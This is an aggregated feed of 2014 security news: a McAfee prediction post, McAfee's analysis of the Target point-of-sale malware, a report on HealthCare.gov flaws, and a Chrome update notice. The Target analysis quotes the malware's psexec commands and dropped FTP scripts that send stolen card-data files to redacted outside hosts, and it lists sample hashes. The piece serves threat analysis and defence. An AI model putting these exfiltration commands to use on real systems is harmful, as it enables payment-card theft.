2014 Threats Predictions: Malware to Take Advantage of Hotspots, Gaming Consoles

This post is the last in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar.

Renewed interest in small-office and home-office router hacking, and an uptick in successful exploitations will lead to an increase in WiFi hotspot–related threats. This threat vector will lead to more cross-platform attacks. Public access points are especially worrisome because any system on the network can be impacted by an infected computer that had previously connected to the same hotspot.

With the increasing versatility of Internet-connected gaming consoles, the chances of randomly downloading malware while browsing or installing an app is also increasing. Fueled by the releases of the Microsoft Xbox One and Sony PlayStation 4 in 2013, we expect to see attacks on these platforms grow in proportion with their adoption.

The post 2014 Threats Predictions: Malware to Take Advantage of Hotspots, Gaming Consoles appeared first on McAfee.

Analyzing the Target Point-of-Sale Malware

January 21, 2014:  As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.   To shed more detailed light on the malware specific to these events, our team in McAfee Labs has released an updated Threat Advisory entitled “McAfee Labs Threat Advisory: EPOS Data Theft“.  The report covers specific traits and activity around this family, in addition to some background on “BlackPOS”.   Updated details around McAfee countermeasures and mitigation are included as well.

McAfee Labs Threat Advisory: EPOS Data Theft

Current AV Detections:

  • 6597DF782CBD7DC270BB12CDF95D21B4       BackDoor-FBPP
  • 5DBD7BC7A672DA61F6F43AAF6FA3C661       BackDoor-FBPP
  • BA443C2E10D0278FC30069F61BC56439       BackDoor-FBPP
  • 7F9CDC380EEED16EAAB3E48D59F271AA      PWS-FBOI
  • 3D5BF67955DC77AF4CA8BF6CB1F96065         PWS-FBOI
  • BA0F556CE558453AD1526409B5B69EF3         PWS-FBOI
  • F45F8DF2F476910EE8502851F84D1A6E          PWS-FBOJ
  • CE0296E2D77EC3BB112E270FC260F274        PWS-FBOJ
  • 4D445B11F9CC3334A4925A7AE5EBB2B7         BackDoor-FBPL
  • 7F1E4548790E7D93611769439A8B39F2           BackDoor-FBPL
  • 762DDB31C0A10A54F38C82EFA0D0A014      BackDoor-FBPL
  • C0C9C5E1F5A9C7A3A5043AD9C0AFA5FD      BackDoor-FBPL

Additional Countermeasures

  • McAfee Application Control - Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.

Malware of this variety will typically be targeted.  The adversaries will activity attempt to evade AV detection where possible.  It is critical to apply countermeasures outside the typical AV scanning procedures.  Application Control/Whitelisting will be extremely successful in blocking/inhibiting these tools. In addition, network monitoring and controls (real-time monitoring and intelligent analytics of SIEM data) will allow for victims to know exactly what malicious behaviors are occurring in their environment at the time of compromise, and where the artifacts/indicators are.

January 16, 2014: In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.

Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.

Sample Information/Sources

  • ce0296e2d77ec3bb112e270fc260f274–ThreatExpert (cache)
  • F45F8DF2F476910EE8502851F84D1A6E–ThreatExpert (cache)
  • 7f1e4548790e7d93611769439a8b39f2–VirusTotal
  • 4d445b11f9cc3334a4925a7ae5ebb2b7–VirusTotal
  • 762ddb31c0a10a54f38c82efa0d0a014–Virus Total
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd–VirusTotal

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.

Possible Actor/Attribution Data

Both uploaders contain the following string (compile path)

  • z:\Projects\Rescator\uploader\Debug\scheck.pdb

Rescator is a known actor in various cybercrime forums:

forum

 

 

 

 

Data Collection and Transfer

Data is collected and transferred to internal shares via the following command syntax:

  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\<EPOS_IPaddr> -u <username> -p <password> cmd /c “taskkill /im bladelogic.exe /f”
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\<EPOS_IPaddr> -u <username> -p <password> -d bladelogic
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\<EPOS_IPaddr>\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt

Note: The reference to “bladelogic” is a method of obfuscation.  The malware does not compromise, or integrate with, any BMC products in any way.   The executable name “bladelogic.exe” does not exist in any piece of legitimate BMC software.

“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:

——————————————
open xxx.xxx.xxx.xx

%name%

%password%

cd public_html

cd cgi-bin

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt

quit

——————————————

Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.

——————————————
open xx.xxx.xxx.xx

%name%

%password%

cd 001

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

quit

——————————————

——————————————
open xx.xx.xxx.xx

%name%

%password%

cd etc

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

quit

——————————————

Compilation Dates

  • 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
  • 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec  3 00:15:01 2013 UTC
  • 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC

 

The post Analyzing the Target Point-of-Sale Malware appeared first on McAfee.

HealthCare.gov riddled with flaws that could expose user data, experts say

The federal government's HealthCare.gov website continues to be riddled with flaws that expose confidential user data to the public, a security expert testified Thursday at a hearing on Capitol Hill.

David Kennedy, founder of security firm TrustedSec, told members of the House of Representatives Science Committee that only one of 18 issues he reported in November had been fixed, and even then he identified ways that attackers could bypass the remedy. Kennedy didn't discuss specifics of the vulnerabilities out of concern that details would make it easier for criminals to exploit the weaknesses. Generally, he said some of the weaknesses leaked usernames, e-mail addresses, and other data contained in user profiles onto the open Internet, making it possible for unauthorized people to access the information using Google or other search engines. The testimony came as top security officials from the US Department of Health and Human Services (HHS), which helps oversee HealthCare.gov, were appearing before a separate House hearing.

"TrustedSec cannot state with 100 percent certainty that the back-end infrastructure is vulnerable," Kennedy wrote in a statement submitted in advance of Thursday's proceedings. "However, based on our extensive experience performing application security assessments for over 10 years, the website has the symptoms that lead to large-scale breaches for large organizations. Also note that all exposures have been reported, and TrustedSec would be more than willing to have discussions with HHS to address the security concerns."

Read 6 remaining paragraphs | Comments

Google Releases Google Chrome Updates

Original release date: January 16, 2014

Google has released Google Chrome 32.0.1700.95 for all Chrome OS devices (except Chromebook Pixel), Google Chrome 32.0.1700.76 for Windows and Chrome Frame, and Google Chrome 32.0.1700.77 for Mac and Linux to address multiple vulnerabilities.  These vulnerabilities could allow a remote attacker to cause a denial-of-service condition, spoof the address bar, or execute arbitrary code. 

US-CERT encourages users and administrators to review the Google Chrome release blog and follow best-practice security policies to determine which updates should be applied.


This product is provided subject to this Notification and this Privacy & Use policy.